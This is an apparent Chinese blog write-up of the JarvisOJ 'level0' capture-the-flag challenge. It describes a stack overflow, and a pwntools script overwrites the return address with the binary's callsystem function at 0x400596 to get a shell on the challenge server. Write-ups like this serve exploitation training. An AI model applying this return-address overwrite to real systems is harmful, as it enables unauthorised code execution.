level0

作者: n0va | 来源:发表于2019-03-21 21:25 被阅读0次

    checksec 一波,只开了NX

    image.png

    再IDA看一下程序 ,栈溢出,再找一找有没有可用的函数

    image.png

    发现了这个

    image.png

    exp:

    #-*- coding:utf-8 -*-
    from pwn import *
    # p = process('./level0')
    p = remote("pwn2.jarvisoj.com","9881")
    callsystem = 0x400596
    payload = 0x80*"A" + p64(0) + p64(callsystem)
    p.sendline(payload)
    p.interactive()
    

    相关文章

      网友评论

          本文标题:level0

          本文链接:https://www.haomeiwen.com/subject/peenjqtx.html